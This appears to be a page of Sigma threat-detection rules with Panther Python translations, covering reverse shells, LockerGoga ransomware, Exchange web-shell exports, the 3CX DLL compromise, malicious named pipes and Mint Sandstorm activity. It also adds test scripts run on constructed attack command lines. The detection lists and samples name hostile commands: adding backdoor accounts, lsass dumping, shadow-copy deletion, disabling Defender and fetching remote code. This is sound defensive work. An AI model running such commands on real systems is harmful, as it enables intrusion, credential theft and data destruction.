    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical
critical
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
status stable author Vasiliy Burov, oscd.community id 74db3488-fd28-480a-95aa-b7af626de068
panther query
def rule(event):
    if "-i SM-tgytutrc -s" in event.deep_get("CommandLine", default=""):
        return True
    return False
view Sigma YAML
title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
    - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
    - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
    - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
    - attack.impact
    - attack.t1486
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '-i SM-tgytutrc -s'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Mailbox Export to Exchange Webserver
Detects a successful export of an Exchange mailbox to an atypical location (a UNC share path) or with an .aspx file name suffix, which can be used to place a web shell, or the role assignment that such an export requires
status test author Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems) id 516376b4-05cd-4122-bae0-ad7641c38d48
panther query
def _event_text(value):
    # Flatten every scalar in the (possibly nested) event into one string. The
    # rendered query matched against json.dumps(), which escapes the double
    # quotes and backslashes in ' -Role "Mailbox Import Export"' and
    # '-FilePath "\\\\', so those keywords could never match a serialised event.
    if isinstance(value, dict):
        return " ".join(_event_text(v) for v in value.values())
    if isinstance(value, (list, tuple)):
        return " ".join(_event_text(v) for v in value)
    return str(value)


def rule(event):
    # Sigma keyword matching is case-insensitive, so compare lower-cased text.
    text = _event_text(event.to_dict()).lower()
    export_command = all(
        [
            "new-mailboxexportrequest" in text,
            " -mailbox " in text,
        ]
    )
    export_params = any(
        [
            '-filepath "\\\\' in text,  # any UNC share location
            ".aspx" in text,
        ]
    )
    role_assignment = all(
        [
            "new-managementroleassignment" in text,
            ' -role "mailbox import export"' in text,
            " -user " in text,
        ]
    )
    return (export_command and export_params) or role_assignment
view Sigma YAML
title: Mailbox Export to Exchange Webserver
id: 516376b4-05cd-4122-bae0-ad7641c38d48
status: test
description: Detects a successful export of an Exchange mailbox to an atypical location (a UNC share path) or with an .aspx file name suffix, which can be used to place a web shell, or the role assignment that such an export requires
references:
    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
date: 2021-08-09
modified: 2023-04-30
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    service: msexchange-management
    product: windows
detection:
    export_command:
        '|all':
            - 'New-MailboxExportRequest'
            - ' -Mailbox '
    export_params:
        - '-FilePath "\\\\' # We care about any share location.
        - '.aspx'
    role_assignment:
        '|all':
            - 'New-ManagementRoleAssignment'
            - ' -Role "Mailbox Import Export"'
            - ' -User '
    condition: (export_command and export_params) or role_assignment
falsepositives:
    - Unlikely
level: critical
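The rule above is a keyword rule: Sigma matches the strings anywhere in the event, so the Panther rendering has to search the whole record. Matching against json.dumps() output silently breaks the two keywords that contain a double quote, because JSON serialisation turns `"` into `\"` and each backslash into `\\`. The following is an added example, not the page's rendered query or SigmaHQ's code: it runs the rule's logic over constructed MSExchange Management events, once against the raw field values and once against the JSON-serialised event, so the difference is visible. The StubEvent class is a stand-in for Panther's event object (only the to_dict() accessor the rule uses is modelled), and the field names in the samples are assumptions.

```python
"""Constructed MSExchange Management events run through the Mailbox Export rule.

Added example (not the page's rendered query). The event class is a stand-in for
Panther's event object: only the to_dict() accessor the rule uses is modelled,
and the field names in the samples are assumptions; the Sigma rule matches its
keywords anywhere in the event, so the names do not matter to the logic.
"""
import json


class StubEvent:
    """Stand-in for Panther's event object (assumption: only to_dict() is needed)."""

    def __init__(self, data):
        self._data = data

    def to_dict(self):
        return dict(self._data)


def flatten_event(value):
    """Join every scalar in a (nested) event into one string, without JSON escaping."""
    if isinstance(value, dict):
        return " ".join(flatten_event(v) for v in value.values())
    if isinstance(value, (list, tuple)):
        return " ".join(flatten_event(v) for v in value)
    return str(value)


def mailbox_export_logic(text):
    """The rule's keyword logic over one text blob; lower-cased because Sigma matching is case-insensitive."""
    text = text.lower()
    export_command = "new-mailboxexportrequest" in text and " -mailbox " in text
    export_params = '-filepath "\\\\' in text or ".aspx" in text
    role_assignment = (
        "new-managementroleassignment" in text
        and ' -role "mailbox import export"' in text
        and " -user " in text
    )
    return (export_command and export_params) or role_assignment


def rule_flattened(event):
    """Match against the raw field values."""
    return mailbox_export_logic(flatten_event(event.to_dict()))


def rule_json_dumps(event):
    """The page's original strategy: match against json.dumps(), which escapes '"' and backslashes."""
    return mailbox_export_logic(json.dumps(event.to_dict()))


# Constructed samples (not captured logs) shaped like MSExchange Management log entries.
SAMPLES = {
    "export_aspx": StubEvent({
        "Cmdlet": "New-MailboxExportRequest",
        "Message": 'New-MailboxExportRequest -Mailbox "john@corp.local" '
                   '-FilePath "\\\\localhost\\c$\\inetpub\\wwwroot\\aspnet_client\\x.aspx"',
    }),
    "export_unc": StubEvent({
        "Cmdlet": "New-MailboxExportRequest",
        "Message": 'New-MailboxExportRequest -Mailbox "bob@corp.local" -FilePath "\\\\srv\\share\\bob.pst"',
    }),
    "role_assignment": StubEvent({
        "Cmdlet": "New-ManagementRoleAssignment",
        "Message": 'New-ManagementRoleAssignment -Role "Mailbox Import Export" -User "admin@corp.local"',
    }),
    "benign": StubEvent({
        "Cmdlet": "Get-MailboxStatistics",
        "Message": 'Get-MailboxStatistics -Identity "jane@corp.local"',
    }),
}


def evaluate():
    """Return {sample: (flattened_result, json_dumps_result)} for every constructed event."""
    return {name: (rule_flattened(e), rule_json_dumps(e)) for name, e in SAMPLES.items()}


if __name__ == "__main__":
    for name, (flat, dumped) in evaluate().items():
        print(f"{name:16} raw-text match={flat!s:5} json.dumps match={dumped}")
```

The .aspx export fires either way because the `.aspx` keyword contains no quote; the UNC-share export and the role assignment fire only against the raw text. When porting any Sigma keyword rule whose values contain quotes or backslashes, flatten the event rather than serialising it.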
critical
Malicious DLL Load By Compromised 3CXDesktopApp
Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp
status test author Nasreddine Bencherchali (Nextron Systems) id d0b65ad3-e945-435e-a7a9-438e62dd48e9
panther query
# Hashes from the Sigma selection, matched as substrings of the Sysmon image_load
# 'Hashes' field (e.g. "SHA256=...,MD5=..."). Sigma matching is case-insensitive,
# so the field is upper-cased before comparison.
COMPROMISED_3CX_DLL_HASHES = (
    # ffmpeg.dll
    "SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896",
    "SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429",
    "MD5=74BC2D0B6680FAA1A5A76B27E5479CBC",
    # d3dcompiler_47.dll
    "SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03",
    "SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E",
    "MD5=82187AD3F0C6C225E2FBA0C867280CC9",
    # Inner object from ffmpeg.dll
    "SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952",
    "SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30",
    "MD5=11BC82A9BD8297BD0823BCE5D6202082",
    # ICONIC Stealer payload
    "SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423",
    "SHA1=3B3E778B647371262120A523EB873C20BB82BEAF",
    "MD5=7FAEA2B01796B80D180399040BB69835",
)


def rule(event):
    hashes = event.deep_get("Hashes", default="").upper()
    return any(h in hashes for h in COMPROMISED_3CX_DLL_HASHES)
view Sigma YAML
title: Malicious DLL Load By Compromised 3CXDesktopApp
id: d0b65ad3-e945-435e-a7a9-438e62dd48e9
related:
    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
      type: similar
    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
      type: similar
    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
      type: similar
    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
      type: similar
    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
      type: similar
    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
      type: similar
    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
      type: similar
status: test
description: Detects DLL load activity of known compromised DLLs used by the compromised 3CXDesktopApp
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-31
modified: 2024-11-23
tags:
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Hashes|contains:
            # ffmpeg.dll
            - 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'
            - 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'
            - 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'
            # d3dcompiler_47.dll
            - 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'
            - 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'
            - 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'
            # Inner object from ffmpeg.dll
            - 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'
            - 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'
            - 'MD5=11BC82A9BD8297BD0823BCE5D6202082'
            # ICONIC Stealer payload
            - 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'
            - 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'
            - 'MD5=7FAEA2B01796B80D180399040BB69835'
    condition: selection
falsepositives:
    - Unlikely
level: critical
critical
Malicious Named Pipe Created
Detects the creation of a named pipe seen used by known APTs or malware.
status test author Florian Roth (Nextron Systems), blueteam0ps, elhoim id fe3ac066-98bb-432a-b1e7-a5229cb39d4a
panther query
# Exact pipe names from the Sigma selection (the family each belongs to is noted
# in the YAML below). Sigma string matching is case-insensitive, so both the list
# and the event field are lower-cased before comparison.
MALICIOUS_PIPE_NAMES = frozenset(
    name.lower()
    for name in (
        "\\46a676ab7f179e511e30dd2dc41bd388",
        "\\583da945-62af-10e8-4902-a8f205c72b2e",
        "\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7",
        "\\9f81f59bc58452127884ce513865ed20",
        "\\adschemerpc",
        "\\ahexec",
        "\\AnonymousPipe",
        "\\bc31a7",
        "\\bc367",
        "\\bizkaz",
        "\\csexecsvc",
        "\\dce_3d",
        "\\e710f28d59aa529d6792ca6ff0ca1b34",
        "\\gruntsvc",
        "\\isapi_dg",
        "\\isapi_dg2",
        "\\isapi_http",
        "\\jaccdpqnvbrrxlaf",
        "\\lsassw",
        "\\NamePipe_MoreWindows",
        "\\pcheap_reuse",
        "\\rpchlp_3",
        "\\sdlrpc",
        "\\svcctl",
        "\\testPipe",
        "\\winsession",
    )
)
# Wildcard entry '\Posh*' from the selection: a prefix match.
MALICIOUS_PIPE_PREFIXES = ("\\posh",)


def rule(event):
    pipe_name = event.deep_get("PipeName", default="").lower()
    return pipe_name in MALICIOUS_PIPE_NAMES or pipe_name.startswith(MALICIOUS_PIPE_PREFIXES)
view Sigma YAML
title: Malicious Named Pipe Created
id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
status: test
description: Detects the creation of a named pipe seen used by known APTs or malware.
references:
    - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
    - https://securelist.com/faq-the-projectsauron-apt/75533/
    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
    - https://www.us-cert.gov/ncas/alerts/TA17-117A
    - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
    - https://thedfirreport.com/2020/06/21/snatch-ransomware/
    - https://github.com/RiccardoAncarani/LiquidSnake
    - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
    - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
    - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
    - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
date: 2017-11-06
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName:
            - '\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron
            - '\583da945-62af-10e8-4902-a8f205c72b2e'  # SolarWinds SUNBURST malware
            - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7'  # LiquidSnake
            - '\9f81f59bc58452127884ce513865ed20'  # Project Sauron
            - '\adschemerpc'  # Turla HyperStack
            - '\ahexec'  # Sofacy group malware
            - '\AnonymousPipe'  # Hidden Cobra Hoplight
            - '\bc31a7'  # Pacifier
            - '\bc367'  # Pacifier
            - '\bizkaz'  # Snatch Ransomware
            - '\csexecsvc' # CSEXEC default
            - '\dce_3d' # Qbot
            - '\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron
            - '\gruntsvc' # Covenant default
            - '\isapi_dg'  # Uroburos Malware
            - '\isapi_dg2'  # Uroburos Malware
            - '\isapi_http'  # Uroburos Malware
            - '\jaccdpqnvbrrxlaf' # PoshC2 default
            - '\lsassw'  # Wild Neutron APT malware
            - '\NamePipe_MoreWindows'  # Cloud Hopper - RedLeaves
            - '\pcheap_reuse'  # Pipe used by Equation Group malware
            - '\Posh*' # PoshC2 default
            - '\rpchlp_3'  # Project Sauron
            - '\sdlrpc'  # Cobra Trojan
            - '\svcctl' # Crackmapexec smbexec default
            - '\testPipe'  # Emissary Panda Hyperbro
            - '\winsession'  # Wild Neutron APT malware
            # - '\status_*' # CS default  https://github.com/SigmaHQ/sigma/issues/253
    condition: selection
falsepositives:
    - Unknown
level: critical
critical
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious process execution spawned from Aspera Faspex, as seen used by Mint Sandstorm
status test author Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) id 91048c0d-5b81-4b85-a099-c9ee4fb87979
panther query
import re


def rule(event):
    if all(
        [
            "aspera" in event.deep_get("ParentImage", default=""),
            "\\ruby" in event.deep_get("ParentImage", default=""),
            any(
                [
                    all(
                        [
                            any(
                                [
                                    event.deep_get("Image", default="").endswith(
                                        "\\powershell.exe"
                                    ),
                                    event.deep_get("Image", default="").endswith(
                                        "\\powershell_ise.exe"
                                    ),
                                ]
                            ),
                            any(
                                [
                                    any(
                                        [
                                            " echo " in event.deep_get("CommandLine", default=""),
                                            "-dumpmode"
                                            in event.deep_get("CommandLine", default=""),
                                            "-ssh" in event.deep_get("CommandLine", default=""),
                                            ".dmp" in event.deep_get("CommandLine", default=""),
                                            "add-MpPreference"
                                            in event.deep_get("CommandLine", default=""),
                                            "adscredentials"
                                            in event.deep_get("CommandLine", default=""),
                                            "bitsadmin"
                                            in event.deep_get("CommandLine", default=""),
                                            "certutil" in event.deep_get("CommandLine", default=""),
                                            "csvhost.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "DownloadFile"
                                            in event.deep_get("CommandLine", default=""),
                                            "DownloadString"
                                            in event.deep_get("CommandLine", default=""),
                                            "dsquery" in event.deep_get("CommandLine", default=""),
                                            "ekern.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "FromBase64String"
                                            in event.deep_get("CommandLine", default=""),
                                            "iex " in event.deep_get("CommandLine", default=""),
                                            "iex(" in event.deep_get("CommandLine", default=""),
                                            "Invoke-Expression"
                                            in event.deep_get("CommandLine", default=""),
                                            "Invoke-WebRequest"
                                            in event.deep_get("CommandLine", default=""),
                                            "localgroup administrators"
                                            in event.deep_get("CommandLine", default=""),
                                            "o365accountconfiguration"
                                            in event.deep_get("CommandLine", default=""),
                                            "samaccountname="
                                            in event.deep_get("CommandLine", default=""),
                                            "set-MpPreference"
                                            in event.deep_get("CommandLine", default=""),
                                            "svhost.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "System.IO.Compression"
                                            in event.deep_get("CommandLine", default=""),
                                            "System.IO.MemoryStream"
                                            in event.deep_get("CommandLine", default=""),
                                            "usoprivate"
                                            in event.deep_get("CommandLine", default=""),
                                            "usoshared"
                                            in event.deep_get("CommandLine", default=""),
                                            "whoami" in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                    any(
                                        [
                                            # Sigma '|re' is an unanchored search, so re.search,
                                            # not re.match; and in a raw string r"\\s" is a literal
                                            # backslash followed by 's', not whitespace.
                                            re.search(
                                                r"[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}",
                                                event.deep_get("CommandLine", default=""),
                                            ),
                                            re.search(
                                                r"net\s+user",
                                                event.deep_get("CommandLine", default=""),
                                            ),
                                            re.search(
                                                r"net\s+group",
                                                event.deep_get("CommandLine", default=""),
                                            ),
                                            re.search(
                                                r"query\s+session",
                                                event.deep_get("CommandLine", default=""),
                                            ),
                                        ]
                                    ),
                                ]
                            ),
                        ]
                    ),
                    all(
                        [
                            "lsass" in event.deep_get("CommandLine", default=""),
                            any(
                                [
                                    "procdump" in event.deep_get("CommandLine", default=""),
                                    "tasklist" in event.deep_get("CommandLine", default=""),
                                    "findstr" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                    any(
                        [
                            all(
                                [
                                    event.deep_get("Image", default="").endswith("\\wget.exe"),
                                    "http" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    event.deep_get("Image", default="").endswith("\\curl.exe"),
                                    "http" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    "E:jscript" in event.deep_get("CommandLine", default=""),
                                    "e:vbscript" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "localgroup Administrators"
                                    in event.deep_get("CommandLine", default=""),
                                    "/add" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "net" in event.deep_get("CommandLine", default=""),
                                    "user" in event.deep_get("CommandLine", default=""),
                                    "/add" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            any(
                                [
                                    all(
                                        [
                                            "reg add" in event.deep_get("CommandLine", default=""),
                                            "DisableAntiSpyware"
                                            in event.deep_get("CommandLine", default=""),
                                            "\\Microsoft\\Windows Defender"
                                            in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                    all(
                                        [
                                            "reg add" in event.deep_get("CommandLine", default=""),
                                            "DisableRestrictedAdmin"
                                            in event.deep_get("CommandLine", default=""),
                                            "CurrentControlSet\\Control\\Lsa"
                                            in event.deep_get("CommandLine", default=""),
                                        ]
                                    ),
                                ]
                            ),
                            all(
                                [
                                    "wmic" in event.deep_get("CommandLine", default=""),
                                    "process call create"
                                    in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "wmic" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "shadowcopy" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "vssadmin" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "shadows" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                            all(
                                [
                                    "wbadmin" in event.deep_get("CommandLine", default=""),
                                    "delete" in event.deep_get("CommandLine", default=""),
                                    "catalog" in event.deep_get("CommandLine", default=""),
                                ]
                            ),
                        ]
                    ),
                ]
            ),
        ]
    ):
        return True
    return False
view Sigma YAML
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious process execution spawned from Aspera Faspex, as seen used by Mint Sandstorm
references:
    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|contains|all:
            - 'aspera'
            - '\ruby'
    selection_special_child_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
    selection_special_child_powershell_cli:
        - CommandLine|contains:
              - ' echo '
              - '-dumpmode'
              - '-ssh'
              - '.dmp'
              - 'add-MpPreference'
              - 'adscredentials'
              - 'bitsadmin'
              - 'certutil'
              - 'csvhost.exe'
              - 'DownloadFile'
              - 'DownloadString'
              - 'dsquery'
              - 'ekern.exe'
              - 'FromBase64String'
              - 'iex '
              - 'iex('
              - 'Invoke-Expression'
              - 'Invoke-WebRequest'
              - 'localgroup administrators'
              - 'o365accountconfiguration'
              - 'samaccountname='
              - 'set-MpPreference'
              - 'svhost.exe'
              - 'System.IO.Compression'
              - 'System.IO.MemoryStream'
              - 'usoprivate'
              - 'usoshared'
              - 'whoami'
        - CommandLine|re:
              - '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
              - 'net\s+user'
              - 'net\s+group'
              - 'query\s+session'
    selection_special_child_lsass_1:
        CommandLine|contains: 'lsass'
    selection_special_child_lsass_2:
        CommandLine|contains:
            - 'procdump'
            - 'tasklist'
            - 'findstr'
    selection_child_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains: 'http'
    selection_child_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: 'http'
    selection_child_script:
        CommandLine|contains:
            - 'E:jscript'
            - 'e:vbscript'
    selection_child_localgroup:
        CommandLine|contains|all:
            - 'localgroup Administrators'
            - '/add'
    selection_child_net:
        CommandLine|contains: 'net' # Covers net1
        CommandLine|contains|all:
            - 'user'
            - '/add'
    selection_child_reg:
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableAntiSpyware'
              - '\Microsoft\Windows Defender'
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableRestrictedAdmin'
              - 'CurrentControlSet\Control\Lsa'
    selection_child_wmic_1:
        CommandLine|contains|all:
            - 'wmic'
            - 'process call create'
    selection_child_wmic_2:
        CommandLine|contains|all:
            - 'wmic'
            - 'delete'
            - 'shadowcopy'
    selection_child_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin'
            - 'delete'
            - 'shadows'
    selection_child_wbadmin:
        CommandLine|contains|all:
            - 'wbadmin'
            - 'delete'
            - 'catalog'
    condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
    - Unlikely
level: critical
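The `CommandLine|re` selection in this rule (and in the ManageEngine variant that follows, which carries the same four patterns) is where a Sigma-to-Python rendering most easily goes wrong: Sigma's `re` modifier is an unanchored, case-sensitive search, which maps to `re.search`, not `re.match`, and a pattern copied into a raw string must keep its single backslash, because `r"\\s"` is a literal backslash followed by `s`. The following is an added example, not the page's rendered query or SigmaHQ's code: it runs the rule's four regexes over constructed command lines three ways, so the effect of each mistake is visible. The command lines are constructed samples; the en dash inside the first character class is the rule's own.

```python
"""Sigma '|re' patterns from the Mint Sandstorm rule translated to Python and run
over constructed command lines.

Added example, not the page's or SigmaHQ's code. The command lines are constructed
samples. It contrasts the page's rendering (re.match with a doubled backslash in a
raw string) with Sigma's semantics: an unanchored, case-sensitive search.
"""
import re

# Exactly as rendered on the page: in a raw string, r"\\s" is a literal backslash
# followed by 's', so these can only match a backslash in the command line.
PAGE_PATTERNS = [
    r"[-/–][Ee^]{1,2}[ncodema^]*\\s[A-Za-z0-9+/=]{15,}",
    r"net\\s+user",
    r"net\\s+group",
    r"query\\s+session",
]

# As written in the Sigma YAML (the en dash in the first class is the rule's own).
SIGMA_PATTERNS = [
    r"[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}",
    r"net\s+user",
    r"net\s+group",
    r"query\s+session",
]


def sigma_search(command_line):
    """Sigma semantics: the pattern may occur anywhere in the field."""
    return any(re.search(p, command_line) is not None for p in SIGMA_PATTERNS)


def sigma_anchored(command_line):
    """Correct pattern, wrong call: re.match only matches at offset 0."""
    return any(re.match(p, command_line) is not None for p in SIGMA_PATTERNS)


def page_rendered(command_line):
    """The page's rendering: re.match with the doubled backslash."""
    return any(re.match(p, command_line) is not None for p in PAGE_PATTERNS)


# Constructed command lines (samples, not captured logs) of the kind the rule
# expects under an Aspera Faspex ruby.exe parent.
SAMPLES = {
    # Encoded PowerShell launched via cmd: the '-enc <base64>' sits mid-string.
    "encoded_ps": "cmd.exe /c powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    # Local account creation; two spaces between net and user.
    "net_user_add": "cmd.exe /c net  user backdoor Passw0rd1 /add",
    # Same command at offset 0, the only place re.match can see it.
    "net_user_start": "net user backdoor Passw0rd1 /add",
    # The only kind of input the doubled-backslash regex can match.
    "literal_backslash": r"net\ssuser",
    "benign": 'ruby.exe -e "puts 1"',
}


def evaluate():
    """Return {sample: (sigma_search, sigma_anchored, page_rendered)}."""
    return {n: (sigma_search(c), sigma_anchored(c), page_rendered(c)) for n, c in SAMPLES.items()}


if __name__ == "__main__":
    for name, results in evaluate().items():
        print(f"{name:18} search/anchored/page = {results}")
```

Only `sigma_search` flags the encoded PowerShell and the `net user /add` launched through `cmd.exe /c`; the anchored variant sees the command only when it starts the line, and the page's doubled-backslash patterns match nothing a real process would produce. When converting a rule by hand, compile the Sigma pattern unchanged and drive it with `re.search`.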
critical
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious process execution spawned from ManageEngine, as seen used by Mint Sandstorm
status test author Nasreddine Bencherchali (Nextron Systems), MSTIC (idea) id 58d8341a-5849-44cd-8ac8-8b020413a31b
panther query
import re


def rule(event):
    if all(
        [
            any(
                [
                    "manageengine" in event.deep_get("ParentImage", default=""),
                    "ServiceDesk" in event.deep_get("ParentImage", default=""),
                ]
            ),
            "\\java" in event.deep_get("ParentImage", default=""),
            any(
                [
                    all(
                        [
                            any(
                                [
                                    event.deep_get("Image", default="").endswith(
                                        "\\powershell.exe"
                                    ),
                                    event.deep_get("Image", default="").endswith(
                                        "\\powershell_ise.exe"
                                    ),
                                ]
                            ),
                            any(
                                [
                                    any(
                                        [
                                            " echo " in event.deep_get("CommandLine", default=""),
                                            "-dumpmode"
                                            in event.deep_get("CommandLine", default=""),
                                            "-ssh" in event.deep_get("CommandLine", default=""),
                                            ".dmp" in event.deep_get("CommandLine", default=""),
                                            "add-MpPreference"
                                            in event.deep_get("CommandLine", default=""),
                                            "adscredentials"
                                            in event.deep_get("CommandLine", default=""),
                                            "bitsadmin"
                                            in event.deep_get("CommandLine", default=""),
                                            "certutil" in event.deep_get("CommandLine", default=""),
                                            "csvhost.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "DownloadFile"
                                            in event.deep_get("CommandLine", default=""),
                                            "DownloadString"
                                            in event.deep_get("CommandLine", default=""),
                                            "dsquery" in event.deep_get("CommandLine", default=""),
                                            "ekern.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "FromBase64String"
                                            in event.deep_get("CommandLine", default=""),
                                            "iex " in event.deep_get("CommandLine", default=""),
                                            "iex(" in event.deep_get("CommandLine", default=""),
                                            "Invoke-Expression"
                                            in event.deep_get("CommandLine", default=""),
                                            "Invoke-WebRequest"
                                            in event.deep_get("CommandLine", default=""),
                                            "localgroup administrators"
                                            in event.deep_get("CommandLine", default=""),
                                            "o365accountconfiguration"
                                            in event.deep_get("CommandLine", default=""),
                                            "samaccountname="
                                            in event.deep_get("CommandLine", default=""),
                                            "set-MpPreference"
                                            in event.deep_get("CommandLine", default=""),
                                            "svhost.exe"
                                            in event.deep_get("CommandLine", default=""),
                                            "System.IO.Compression"
                                            in event.deep_get("CommandLine", default=""),
                                            "System.IO.MemoryStream"
                                            in event.deep_get("CommandLine", default=""),
                                            "usoprivate"
